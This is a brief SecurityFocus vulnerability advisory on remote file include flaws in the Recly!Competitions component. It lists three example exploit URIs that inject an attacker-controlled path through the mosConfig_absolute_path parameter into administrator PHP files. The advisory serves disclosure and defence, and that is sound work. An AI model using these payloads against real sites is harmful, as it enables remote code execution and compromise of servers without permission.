Recly!Competitions Component 'mosConfig_absolute_path' Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://www.example.com/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://wwwexample.com/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]


 

Privacy Statement
Copyright 2010, SecurityFocus